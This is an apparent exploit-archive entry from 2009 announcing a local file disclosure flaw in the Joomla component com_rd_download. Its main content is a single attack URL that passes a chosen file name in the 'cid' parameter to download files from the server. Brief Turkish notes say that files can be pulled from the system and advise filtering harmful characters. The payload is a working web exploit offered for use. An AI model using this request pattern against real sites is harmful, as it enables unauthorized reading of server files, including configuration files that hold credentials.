[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_rd_download Local File Disclosure Vulnerability
# Published : 2009-12-30
# Author : FL0RiX
# Previous Title : WingFTP Server v3.2.4 CSRF Vulnerability
# Next Title : UranyumSoft Ylan Servisi Database Disclosure Vulnerability


<------------------- header data start ------------------- >

#############################################################
#        Joomla Component com_rd_download Local File Disclosure Vulnerability
#############################################################

# Author          :  FL0RiX

# Greez          : Deep-Power,PyskE,Ruzgarin_oglu And All Friends

# Name            : com_rd_download

# Bug Type        : Local File Disclosure

# Infection       : sistemden dosya ?ekilebilir

# Bug Fix Advice : zararl&#305; karakterler filtrelenmeli

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_rd_download&view=download&cid=[DOSYADI].php

< -- bug code end of -- >